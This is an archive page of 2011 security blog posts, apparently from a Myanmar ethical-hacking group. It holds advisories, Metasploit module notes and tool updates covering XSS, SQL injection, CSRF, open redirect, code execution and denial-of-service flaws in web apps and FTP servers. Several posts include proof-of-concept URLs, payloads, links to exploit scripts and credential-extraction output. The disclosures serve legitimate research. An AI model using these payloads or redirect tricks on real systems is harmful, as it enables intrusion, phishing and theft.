Posts

Showing posts from 2011

zFtp Server <= 2011-04-13 | "STAT,CWD" Remote Denial of Service Vulnerability

1. OVERVIEW The zFTP server is found to be vulnerable to denial of service in handling STAT and CWD commands with overly large buffer requests. 2. BACKGROUND The zFTP server is a Windows based FTP server with focus on clever Active Directory integration and powerful, effortless administration. 3. VERSIONS AFFECTED 2011-04-13 and earlier 4. PROOF-OF-CONCEPT/EXPLOIT http://www.exploit-db.com/exploits/18028/ 5. SOLUTION The vendor has released the patched version ( http://download.zftpserver.com/zFTPServer_Suite_Setup.exe ) 6. VENDOR Vastgota-Data 7. CREDIT This vulnerability was discovered by Myo Soe, http://yehg.net, YGN Ethical Hacker Group, Myanmar. 8. DISCLOSURE TIME-LINE 2011-06-19: notified vendor through email 2011-10-17: vendor released fixed version, 2011-10-17 2011-10-25: vulnerability disclosed 9. REFERENCES Original Advisory URL: http://core.yehg.net/lab/pr0js/advisories/[zftpserver_2011-04-13]_stat,cwd_dos zFTP Server Home Page:...

vTiger CRM 5.2.x | PHP Version Disclosure

How do attackers try to know PHP version if the server has disabled "X-Powered-By" header (i.e expose_php = Off)?  The vTiger CRM has a flaw that allows attackers to know exact PHP version without authentication.  Attacker can know it by simply visiting the following url without authentication.  /phpversionfail.php  The message shows: "PHP 5.0.x or above is required. Your current PHP version is 5.3 Kindly upgrade the PHP installation, any try again! " Version Affected: Tested on vTiger CRM 5.2.1 

vTiger CRM 5.2.x <= Blind SQL Injection Vulnerability

1. OVERVIEW The vTiger CRM 5.2.1 and lower versions are vulnerable to Blind SQL Injection. No fixed version has been released as of 2011-10-05. 2. BACKGROUND vtiger CRM is a free, full-featured, 100% Open Source CRM software ideal for small and medium businesses, with low-cost product support available to production users that need reliable support. vtiger CRM is a widely used product with thousands of users in dozens of countries. It has a vibrant community of users driving the product forward, and contributing to it's development. Over 2 million copies of vtiger CRM have been downloaded so far. It was launched as a fork of version 1.0 of the SugarCRM project launched on December 31st, 2004. 3. VULNERABILITY DESCRIPTION The "onlyforuser" parameter was not properly sanitized, which allows attacker to conduct Blind SQL Injection Attack. This could an attacker to inject or manipulate SQL queries in the back-end database, allowing for the manipulation or disclosur...

vTiger CRM 5.2.x <= Remote Code Execution Vulnerability

1. OVERVIEW The vTiger CRM 5.2.1 and lower versions are vulnerable to Remote Code Execution. No fixed version has been released as of 2011-10-05. 2. BACKGROUND vtiger CRM is a free, full-featured, 100% Open Source CRM software ideal for small and medium businesses, with low-cost product support available to production users that need reliable support. vtiger CRM is a widely used product with thousands of users in dozens of countries. It has a vibrant community of users driving the product forward, and contributing to it's development. Over 2 million copies of vtiger CRM have been downloaded so far. It was launched as a fork of version 1.0 of the SugarCRM project launched on December 31st, 2004. 3. VULNERABILITY DESCRIPTION vTiger uses the vulnerable version of phpmailer class file located at /cron/class.phpmailer.php . 4. VERSIONS AFFECTED Tested on 5.2.1 5. PROOF-OF-CONCEPT/EXPLOIT File: /cron/class.phpmailer.php [code] 391: function SendmailSend($header, $bo...

vTiger CRM 5.2.x <= Multiple Cross Site Scripting Vulnerabilities

1. OVERVIEW The vTiger CRM 5.2.1 and lower versions are vulnerable to Cross Site Scripting. No fixed version has been released as of 2011-10-04. 2. BACKGROUND vtiger CRM is a free, full-featured, 100% Open Source CRM software ideal for small and medium businesses, with low-cost product support available to production users that need reliable support. vtiger CRM is a widely used product with thousands of users in dozens of countries. It has a vibrant community of users driving the product forward, and contributing to it's development. Over 2 million copies of vtiger CRM have been downloaded so far. It was launched as a fork of version 1.0 of the SugarCRM project launched on December 31st, 2004. 3. VULNERABILITY DESCRIPTION Multiple parameters were not properly sanitized, which allows attacker to conduct Cross Site Scripting attack. This may allow an attacker to create a specially crafted URL that would execute arbitrary script code in a victim's browser. 4. VERSION...

Joomla! 1.7.0 | Multiple Cross Site Scripting (XSS) Vulnerabilities

Image
1. OVERVIEW Joomla! 1.7.0 (stable version) is vulnerable to multiple Cross Site Scripting issues. 2. BACKGROUND Joomla is a free and open source content management system (CMS) for publishing content on the World Wide Web and intranets. It comprises a model–view–controller (MVC) Web application framework that can also be used independently. Joomla is written in PHP, uses object-oriented programming (OOP) techniques and software design patterns, stores data in a MySQL database, and includes features such as page caching, RSS feeds, printable versions of pages, news flashes, blogs, polls, search, and support for language internationalization. 3. VULNERABILITY DESCRIPTION Several parameters (searchword, extension, asset, author ) in Joomla! Core components are not properly sanitized upon submission to the /index.php url, which allows attacker to conduct Cross Site Scripting attack. This may allow an attacker to create a specially crafted URL that would execute arbitrary...

Advanced Electron Forums (AEF) 1.0.9 <= Cross Site Request Forgery (CSRF) Vulnerability

1. OVERVIEW The Advanced Electron Forums (AEF)  1.0.9 <= versions are vulnerable to Cross Site Request Forgery (CSRF). 2. BACKGROUND AEF has a very simple and easy to use Administration Panel and installing this software is a piece of cake! You can install new themes, customize themes the way you want. The User Control Panel has a simple yet beautiful interface where users can set their preferences for the board. 3. VULNERABILITY DESCRIPTION Advanced Electron Forums (AEF) 1.0.9 <=  versions contain a flaw that allows a remote Cross-site Request Forgery (CSRF / XSRF) attack. The flaw exists because the application does not require multiple steps or explicit confirmation for sensitive transactions for majority of administrator functions such as adding new user, assigning user to administrative privilege. By using a crafted URL, an attacker may trick the victim into visiting to his web page to take advantage of the trust relationship between the authenticated...

Hacker Web Search Update

Added some recon searches Re-arranged some categories Add OpenSearch sidebar install  (right besides "[about]" link) Check this out at http://yehg.net/q/

Google: Malware URL Redirection (Google Arbitrary URL Redirect Vulnerability)

The following link will issue URL Redirect Notice: http://www.google.com/url?sa= t&url=http%3A%2F%2Fattacker. in%2Fmalware_exists_in_this_ page%2F And this will bypass the notice: http://www.google.com/url?sa= t&url=http%3A%2F%2Fattacker. in%2Fmalware_exists_in_this_ page%2F&usg= AFQjCNEBtpLqGPICIMz5TJZqfNsZKt HbRg The above bypass link will last as long as Google doesn't change its internal algorithm that compares the hash against the provided URL.  In one way, attackers could let Google search engine crawl their malicious page and calculate "usg" value on behalf of them. In another way, they could simply copy the link from Redirect Notice page which already contains calculated "usg" value. Google Security Team responded that Google blocks known malware URLs and fixing of this issue is unnecessary. Here's a way how attacker will bypass the Google's carefully monitored URL Redirector: 1. Attacker prepares a Proxy link (P1) that r...

Jcow CMS 4.x:4.2 <= , 5.x:5.2 <= | Arbitrary Code Execution

1. OVERVIEW Jcow CMS versions (4.x: 4.2 and lower, 5.x: 5.2 and lower) are vulnerable to Arbitrary Code Execution. 2. BACKGROUND Jcow is a flexible Social Networking software written in PHP. It can help you to build a social network for your interests and passions, a member community for your existing website and a social networking site like facebook/myspace/twitter. 3. VULNERABILITY DESCRIPTION The parameter "attachment" is not properly sanitized upon submission to /index.php, which allows attacker to execute arbitrary PHP code of his own. 4. VERSIONS AFFECTED Free version: 4.x: 4.2 and lower Commercial version: 5.x: 5.2 and lower) 5. PROOF-OF-CONCEPT/EXPLOIT http://dev.metasploit.com/redmine/attachments/1660/jcow_eval.rb jcow 4.2.1: file: /includes/libs/ss.inc.php line: 167 $app = $_POST['attachment']; if (strlen($app) && $app != 'status') { include_once('modules/'.$app....

Jcow CMS 4.2 <= | Cross Site Scripting

1. OVERVIEW Jcow CMS 4.2 and lower versions are vulnerable to Cross Site Scripting. 2. BACKGROUND Jcow is a flexible Social Networking software written in PHP. It can help you to build a social network for your interests and passions, a member community for your existing website and a social networking site like facebook/myspace/twitter. 3. VULNERABILITY DESCRIPTION The parameter "g" is not properly sanitized upon submission to /index.php, which allows attacker to conduct Cross Site Scripting attack. This may allow an attacker to create a specially crafted URL that would execute arbitrary script code in a victim's browser. 4. VERSIONS AFFECTED Jcow CMS 4.2 and lower 5. PROOF-OF-CONCEPT/EXPLOIT File : /includes/libs/member.module.php: Line 605: http://[target]/index.php?p=member/signup&email=&username=&password=&fullname=&birthyear=1991&birthmonth=01&birthday=01&gender=0&location=Myanmar++&abo...

Concrete CMS 5.4.1.1 <= Cross Site Scripting

1. OVERVIEW Concrete CMS 5.4.1.1 and lower versions are vulnerable to Cross Site Scripting. 2. BACKGROUND Concrete5 makes running a website easy. Go to any page in your site, and a editing toolbar gives you all the controls you need to update your website. No intimidating manuals, no complicated administration interfaces - just point and click. 3. VULNERABILITY DESCRIPTION The rcID parameter is not properly sanitized, which allows attacker to conduct Cross Site Scripting attack. This may allow an attacker to create a specially crafted URL that would execute arbitrary script code in a victim's browser. 4. VERSIONS AFFECTED CMS 5.4.1.1 <= 5. PROOF-OF-CONCEPT/EXPLOIT vulnerable parameter: rcID <form action="http://[target]/Concrete/index.php/login/do_login/" method="post"> <input type="hidden" name="uName" value="test" /> <input type="hidden" name="uPasswor...

[Metasploit] Post | Windows Gather AutoLogin User Credential Extractor

http://dev.metasploit.com/redmine/attachments/1642/windows_autologin.rb This module extracts the plain-text Windows user login password in Registry. It exploits a Windows feature that Windows (2K till current Seven) allows a user or third-party Windows Utility tools to configure User AutoLogin via plain-text password insertion in (Alt)DefaultPassword field in the registry location - HKLM\Software\Microsoft\Windows NT\WinLogon. This is readable by all users. meterpreter > run post/windows/gather/credentials/windows_autologin [*] Running against John-PC @ session 1 [+] DefaultDomain=DEPT_SALES, DefaultUser=john, DefaultPassword=pa55w0rd [+] AltDomain=DEPT_HR, AltUser=jack, AltPassword=dr0w55p [*] Storing data... [*] Windows AutoLogin User Credentials saved in: /root/.msf4/loot/20110821034449_default_10.23.12.11_windows.autologi_460131.txt

Elgg 1.7.10 <= | Multiple Vulnerabilities

1. OVERVIEW The Elgg 1.7.10 and lower versions are vulnerable to Cross Site Scripting and SQL Injection. 2. BACKGROUND Elgg is an award-winning social networking engine, delivering the building blocks that enable businesses, schools, universities and associations to create their own fully-featured social networks and applications. Well-known Organizations with networks powered by Elgg include: Australian Government, British Government, Federal Canadian Government, MITRE, The World Bank, UNESCO, NASA, Stanford University, Johns Hopkins University and more (http://elgg.org/powering.php) 3. VULNERABILITY DESCRIPTION The "internalname" parameter is not properly sanitized, which allows attacker to conduct Cross Site Scripting attack. This may allow an attacker to create a specially crafted URL that would execute arbitrary script code in a victim's browser. The "tag_names" is not properly sanitized, which allows attacker to conduct SQL Injection att...

WebsiteBaker 2.8.1 <= Arbitrary File Upload Vulnerability

1. OVERVIEW WebsiteBaker 2.8.1 and lower versions are vulnerable to Arbitrary File Upload. 2. BACKGROUND WebsiteBaker helps you to create the website you want: A free, easy and secure, flexible and extensible open source content management system (CMS). Create new templates within minutes - powered by (X)HTML, CSS and jQuery. With WebsiteBaker it's quite natural your site is W3C-valid, SEO-friendly and accessible - there are no limitations at all. 3. VULNERABILITY DESCRIPTION WebsiteBaker 2.8.1 and lower versions contain a flaw related to the /admin/media/upload.php script failing to restrict uploaded files with extensions - .htaccess, .php4, .php5, .phtml. This may allow an attacker to execute arbitrary PHP code. User account to WebsiteBaker admin backend is required. Attacker could gain access it by way of either brute force or CSRFing to currently-logged in admin users. 4. VERSIONS AFFECTED 2.8.1 <= 5. SOLUTION Upgrade to 2.8.2 or high...

WebsiteBaker 2.8.1 <= Cross Site Request Forgery (CSRF) Vulnerability

1. OVERVIEW WebsiteBaker 2.8.1 and lower versions are vulnerable to Cross Site Request Forgery (CSRF). 2. BACKGROUND WebsiteBaker is a PHP-based Content Management System (CMS) designed with one goal in mind: to enable its users to produce websites with ease. 3. VULNERABILITY DESCRIPTION WebsiteBaker 2.8.1 and lower versions contain a flaw that allows a remote Cross-site Request Forgery (CSRF / XSRF) attack. The flaw exists because the application does not require multiple steps or explicit confirmation for sensitive transactions for majority of administrator functions such as adding new user. By using a crafted URL, an attacker may trick the victim into visiting to his web page to take advantage of the trust relationship between the authenticated victim and the application. Such an attack could trick the victim into executing arbitrary commands in the context of their session with the application, without further prompting or verification. 4. VERSIONS AFFEC...

Mambo CMS 4.6.x (4.6.5) | SQL Injection

Mambo CMS 4.6.x (4.6.5) | SQL Injection 1. OVERVIEW Mambo CMS 4.6.5 and lower versions are vulnerable to SQL Injection. 2. BACKGROUND Mambo is a full-featured, award-winning content management system that can be used for everything from simple websites to complex corporate applications. It is used all over the world to power government portals, corporate intranets and extranets, ecommerce sites, nonprofit outreach, schools, church, and community sites. Mambo's "power in simplicity" also makes it the CMS of choice for many small businesses and personal sites. 3. VULNERABILITY DESCRIPTION The "zorder" parameter was not properly sanitized upon submission to the administrator/index2.php url, which allows attacker to conduct  SQL Injection attack. This could an attacker to inject or manipulate SQL queries in the back-end database, allowing for the manipulation or disclosure of arbitrary data. 4. VERSIONS AFFECTED Tested on Mambo CMS 4.6.5 5. PR...

[Metasploit] New Modules: hp_printer_pjl_traversal & hp_printer_pjl_cmd

http://www.exploit-db.com/exploits/17635/ http://www.exploit-db.com/exploits/17636/ _____________________________________________________ hp_printer_pjl_traversal: This module exploits path traveresal issue in possibly all HP network-enabled printer series, especially those which enable Printer Job Language (aka PJL) command interface through the default JetDirect port 9100. With the decade-old dot-dot-slash payloads, the entire printer file system can be accessed or modified. msf auxiliary(hp_printer_pjl_traversal) > show options Module options (auxiliary/admin/hp_printer_pjl_traversal): Name Current Setting Required Description ---- --------------- -------- ----------- INTERACTIVE true no Enter interactive mode [msfconsole Only] RHOST 202.138.16.21 yes The target address RPATH /hp yes The remote filesystem path to browse or read RPORT 9100 yes The target port msf ...

Elgg 1.7.9 <= | Multiple Cross Site Scripting Vulnerabilities

1. OVERVIEW The Elgg 1.7.9 and lower versions are vulnerable to multiple Cross Site Scripting. 2. BACKGROUND Elgg is an award-winning social networking engine, delivering the building blocks that enable businesses, schools, universities and associations to create their own fully-featured social networks and applications. Well-known Organizations with networks powered by Elgg include: Australian Government, British Government, Federal Canadian Government, MITRE, The World Bank, UNESCO, NASA, Stanford University, Johns Hopkins University and more (http://elgg.org/powering.php) 3. VULNERABILITY DESCRIPTION Several parameters (page_owner, content,internalname, QUERY_STRING) are not properly sanitized, which allows attacker to conduct Cross Site Scripting attack. This may allow an attacker to create a specially crafted URL that would execute arbitrary script code in a victim's browser. 4. VERSIONS AFFECTED Elgg 1.7.9 REQUEST: http://localhost/elgg...

[whatweb] updated ./plugin-development/get-pattern

https://github.com/yehgdotnet/whatweb-plugins/blob/master/plugin-development/get-pattern Added server,cookie,www-authenticate header in /plugin-development/get-pattern $ ./get-pattern http://demo.phpmyadmin.net/master/ == Page Pattern Generator 0.1 for WhatWeb ==         by Aung Khant, http://yehg.net URL: http://demo.phpmyadmin.net/master/ {:name=>'Page MD5', :md5=>'619ef6970f8609c42b944ea776734663'}, {:name=>'HTML Tag Pattern', :tagpattern=>'!doctype,html,head,meta,link,link,title,/title,link,link,link,meta,script,/script,script,/script,script,/script,script,/script,script,/script,script,/script,script,/script,script,/script,/head,body,script,/script,div,h1,/h1,a,/a,/div,div,a,img,/a,h1,bdo,/bdo,/h1,form,input,input,input,input,input,input,fieldset,input,legend,/legend,select,option,/option,option,/option,option,/option,option,/option,option,/option,option,/option,option,/option,option,/option,option,/option,option,/option,...

[whatweb] new plugins - MapServer & HopfTimeServer

https://github.com/yehgdotnet/whatweb-plugins/blob/master/new-plugins/MapServer.rb   $ ./whatweb --follow-redirect=same-domain -a 4 -v -p MapServer http://demo.mapserver.org/ demo.mapserver.org/cgi-bin/mapserv/?map=* [200] http://demo.mapserver.org [200] MapServer[Invalid Map Parameter Detection,Version - 5.6.5 ]   https://github.com/yehgdotnet/whatweb-plugins/blob/master/new-plugins/HopfTimeServer.rb   $ ./whatweb --follow-redirect=same-domain -a 4 -v -p HopfTimeServer http://www.timesync.eu/ www.timesync.eu/ [200] www.timesync.eu/cgi-bin/main.cgi?ntp&0 [200] www.timesync.eu/cgi-bin/main.cgi?ntp&0 [200] http://www.timesync.eu/ [200] HopfTimeServer[Generic Version - 727x,Version - 727100]                                             ...

Joomla! 1.7.0-RC and lower | Multiple Cross Site Scripting (XSS) Vulnerabilities (CVE-2011-2710)

1. OVERVIEW Joomla! 1.7.0-RC and versions of 1.6.x are vulnerable to multiple Cross Site Scripting issues. 2. BACKGROUND Joomla is a free and open source content management system (CMS) for publishing content on the World Wide Web and intranets. It comprises a model–view–controller (MVC) Web application framework that can also be used independently. Joomla is written in PHP, uses object-oriented programming (OOP) techniques and software design patterns, stores data in a MySQL database, and includes features such as page caching, RSS feeds, printable versions of pages, news flashes, blogs, polls, search, and support for language internationalization. 3. VULNERABILITY DESCRIPTION Several parameters (searchword, Request URI) in Joomla! Core components are not properly sanitized upon submission to the /index.php url, which allows attacker to conduct Cross Site Scripting attack. This may allow an attacker to create a specially craf...

Updated ssl-enum-ciphers.nse with sslenum=weak option

The original script, ssl-enum-ciphers, was modified so that it can return only the list of known weak algorithms when specified with sslenum=weak option. With that option, only the known following weak ciphers will be tested. $ nmap --script ssl-enum-ciphers --script-args sslenum=weak -p 443 <host> @output | ssl-enum-ciphers: | SSLv3 | Weak Ciphers (6) | TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA | TLS_DHE_RSA_WITH_DES_CBC_SHA | TLS_RSA_EXPORT_WITH_DES40_CBC_SHA | TLS_RSA_EXPORT_WITH_RC2_CBC_40_MD5 | TLS_RSA_EXPORT_WITH_RC4_40_MD5 | TLS_RSA_WITH_DES_CBC_SHA | Compressors (1) | uncompressed link: http://yehg.net/lab/pr0js/tools/plugins/nmap/ssl-enum-ciphers.nse

MyST BlogSite | Multiple Vulnerabilities

========================================= MyST BlogSite | Multiple Vulnerabilities ========================================= 1. VULNERABILITY DESCRIPTION --> Issue Title: Arbitrary URL Redirect Component: MyST BlogSite ClickDirector Ref: OWASP - Top 10 - 2010 - A10 Ref-Link: https://www.owasp.org/index.php/Top_10_2010-A10-Unvalidated_Redirects_and_Forwards Proof-Of-Concept: http://blogsite.com/public/click/~sites/attacker.in/malware_exists_in_this_page/ http://blog.cenzic.com/public/click/~sites/attacker.in/malware_exists_in_this_page/ [FIXED] --> Issue Title: Information Leakage Ref: WASC-13 Ref-Link: http://projects.webappsec.org/w/page/13246936/Information-Leakage This could be used to brute force (http://blogsite.com/login) Proof-Of-Concept: http://blogsite.com/public/mostl/1 http://blogsite.com/public/mostl/2 http://blogsite.com/public/my-account/1 http://blogsite.com/public/my-account/2 http://blogsite.com/public/object/1 http://blo...

[Metasploit] Microsoft IIS FTP Server <= 7.0 LIST Stack Exhaustion Denial of Service

# Exploit Title: [MS09-053] Microsoft IIS FTP Server <= 7.0 Stack Exhaustion DoS # Version: 5.0 - 7.0 # Tested on: unpatched version of windows xp, 2k3, & Vista Enterprise http://dev.metasploit.com/redmine/attachments/1427/iis567_ftpd_stackexhaust.rb This module triggers Denial of Service condition in the Microsoft Internet Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command containing a wildcard. For this exploit to work in most cases, you need 1) a valid ftp account: either read-only or write-access account 2) the "FTP Publishing" service must be configured as "manual" mode in startup type 3) there must be at least one directory under FTP root directory. If your provided FTP account has write-access privilege and there is no single directory, a new directory with random name will be created prior to sending exploit payload. --------------------------------- Best regards, YGN Ethical Hacker Group Yangon, Myanm...

Vulnerabilities in developer.apple.com

1. VULNERABILITY DESCRIPTION Arbitrary URL Redirect ====================== POC (Browsers: All) https://developer.apple.com/membercenter/urlRedirect.action?fullURL=http://attacker.in/malware_exists_in_this_page Issue References: OWASP Top 10 A10 - https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project CWE 601 - http://cwe.mitre.org/data/definitions/601.html Cross Site Scripting(XSS) Via Arbitrary URL Redirect ==================================================== POC (Browsers: Safari, Opera): https://developer.apple.com/membercenter/urlRedirect.action?fullURL=data%3Atext%2Fhtml%3Bbase64%2CPHNjcmlwdD5hbGVydCgiQ3Jvc3MgU2l0ZSBTY3JpcHRpbmcgRGVtbyBieVxuXG55ZWhnLm5ldFxuIik8L3NjcmlwdD4%3D Issue References: OWASP Top 10 A2 - https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project CWE 79 - http://cwe.mitre.org/data/definitions/79.html HTTP Response Splitting(HRS) Via Arbitrary URL Redirect =====================================================...

[metasploit] TYPSoft FTP Server 1.1 RETR Denial of Service

http://dev.metasploit.com/redmine/attachments/1317/typsoft11_retr.rb Module Category: modules/auxiliary/dos/windows/ftp This module triggers Denial of Service in the TYPSSoft FTP Server 1.1 and earlier by issuing multiple "RETR" command requests. Software Link: http://www.softpedia.com/get/Internet/Servers/FTP-Servers/TYPSoft-FTP-Server.shtml

Full Path Disclosure | Joomla! 1.6.3 and lower (parameters: limitstart, limit , component: com_content)

SEO Mode: =========== http://localhost/joomla163/index.php/using-joomla/extensions/components/content-component/archived-articles?limitstart=-1 http://localhost/joomla163/index.php/using-joomla/extensions/components/content-component/archived-articles?limit=-1&limitstart=1 SEO Mode Off ============ http://localhost/joomla163_noseo/index.php?option=com_content&view=archive&Itemid=256&month=3&year=1&limit=-5&view=archive&option=com_content&limitstart=1 http://localhost/joomla163_noseo/index.php?option=com_content&view=archive&Itemid=256&month=3&year=1&limit=5&view=archive&option=com_content&limitstart=-1 --------------------------------- Best regards, YGN Ethical Hacker Group Yangon, Myanmar http://yehg.net Our Lab | http://yehg.net/lab Our Directory | http://yehg.net/hwd

smallftpd <= 1.0.3-fix | Connection Saturation Remote Denial of Service Vulnerability

smallftpd <= 1.0.3-fix | Connection Saturation Remote Denial of Service Vulnerability 1. OVERVIEW The smallftpd FTP server is found to be vulnerable to denial of service in handling multiple connection requests regardless of its maximum connection settings. Upon successful DoS exploit, the smallftpd will crash or reject new FTP login requests. 2. BACKGROUND The smallftpd FTP server isis a small and simple muli-threaded ftp server for windows. 3. VERSIONS AFFECTED 1.0.3-fix and earlier 4. PROOF-OF-CONCEPT/EXPLOIT http://dev.metasploit.com/redmine/attachments/1330/smallftpd103fix_saturation.rb http://www.exploit-db.com/download/17455 5. SOLUTION The vendor has discontinued this product and therefore has no patch or upgrade that mitigates this problem. It is recommended that an alternate software package be used in its place. 6. VENDOR Arnaud Mary 7. CREDIT This vulnerability was discovered by Myo Soe, http://yehg.net , YGN Ethical Hacker Group, Myanmar. 8. REFERENCES Original Advisor...

Joomla! 1.6.3 and lower | Multiple Cross Site Scripting (XSS) Vulnerabilities

Joomla! 1.6.3 and lower | Multiple Cross Site Scripting (XSS) Vulnerabilities 1. OVERVIEW Joomla! 1.6.3 and lower are vulnerable to multiple Cross Site Scripting issues. 2. BACKGROUND Joomla is a free and open source content management system (CMS) for publishing content on the World Wide Web and intranets. It comprises a model–view–controller (MVC) Web application framework that can also be used independently. Joomla is written in PHP, uses object-oriented programming (OOP) techniques and software design patterns, stores data in a MySQL database, and includes features such as page caching, RSS feeds, printable versions of pages, news flashes, blogs, polls, search, and support for language internationalization. 3. VULNERABILITY DESCRIPTION Several parameters (QueryString, option, searchword) in Joomla! Core components (com_content, com_contact, com_newsfeeds, com_search) are not properly sanitized upon submission to the /index.php url, which allows attacker to conduct Cross Site Script...

Mambo CMS 4.6.x (4.6.5) | Multiple Cross Site Scripting Vulnerabilities

Mambo CMS 4.6.x (4.6.5) | Multiple Cross Site Scripting Vulnerabilities 1. OVERVIEW Mambo CMS 4.6.5 and lower versions are vulnerable to Cross Site Scripting. 2. BACKGROUND Mambo is a full-featured, award-winning content management system that can be used for everything from simple websites to complex corporate applications. It is used all over the world to power government portals, corporate intranets and extranets, ecommerce sites, nonprofit outreach, schools, church, and community sites. Mambo's "power in simplicity" also makes it the CMS of choice for many small businesses and personal sites. 3. VULNERABILITY DESCRIPTION Multiple parameters (task, menu, menutype, zorder, search, client, section) are not properly sanitized, which allows attacker to conduct Cross Site Scripting attack. This may allow an attacker to create a specially crafted URL that would execute arbitrary script code in a victim's browser. 4. VERSIONS AFFECTED Tested on Mambo CMS 4.6.5 (current as...

Updated: Ultimate Recon

http://yehg.net/lab/pr0js/misc/wsa.php Added: lynxview list-urls keywords whatweb Full Disclosure BugTraq

java.com | Arbitrary URL Redirect Vulnerability

================================== java.com | Arbitrary URL Redirect Vulnerability ================================== 1. VULNERABILITY DESCRIPTION - Arbitrary URL Redirect http://java.com/inc/BrowserRedirect1.jsp?locale=en&host=attacker.in Demo: http://yehg.net/lab/pr0js/training/view/misc/java.com_Arbitrary_URL_Redirect/ 2. VENDOR Oracle Inc http://www.oracle.com 3. VULNERABILITY STATUS FIXED 4. DISCLOSURE TIME-LINE 2011-04-19: reported vendor 2011-04-23: vendor fixed the issue 2011-04-24: vulnerability disclosed 5. REFERENCES Original Advisory URL: http://yehg.net/lab/pr0js/advisories/sites/java.com/[java.com]_url_redirection OWASP-Top-10_2010-A10: https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project SANS-TOP-23: http://www.sans.org/top25-software-errors/ CWE-601: http://cwe.mitre.org/data/definitions/601.html #yehg [2011-04-24] --------------------------------- Best regards, YGN Ethical Hacker Group Yangon, Myanmar http://yehg.net Our Lab | http://yehg.net/lab Our Dir...

Joomla! 1.6.1 and lower | Information Disclosure & ClickJacking vulnerabilities

Information Disclosure > Full Path Proof-of-Concept: http://attacker.in/joomla161/index.php?Itemid[]= ClickJacking Proof-of-Concept: http://yehg.net/lab/pr0js/pentest/cross_site_framing.php?url=http://attacker.in/joomla161/administrator Vendor References: http://developer.joomla.org/ security/news/347-20110409- core-clickjacking.html http://developer.joomla.org/ security/news/341-20110402- core-information-disclosure. html

Vulnerabilities in *McAfee.com

Vulnerabilities in *McAfee.com 1. VULNERABILITY DESCRIPTION -> Cross Site Scripting http://download.mcafee.com/products/webhelp/4/1033/#javascript:top.location.replace('http://attacker.in ') -> Information Disclosure > Internal Hostname: http://www.mcafee.com/js/omniture/omniture_profile.js ($ ruby host-extract.rb -a http://www.mcafee.com/js/omniture/omniture_profile.js ) -> Information Disclosure > Source Code Disclosure: view-source: http://download.mcafee.com/clinic/includes/commoninc/cookiecommon.asp view-source: http://download.mcafee.com/clinic/includes/commoninc/appcommon.asp view-source: http://download.mcafee.com/clinic/includes/commoninc/partnerCodesLibrary.asp view-source: http://download.mcafee.com/clinic/Includes/common.asp view-source: http://download.mcafee.com/updates/upgrade_patches.asp view-source: http://download.mcafee.com/updates/common/dat_common.asp view-source: http://download.mcafee.com/updates/updates.asp view-source:...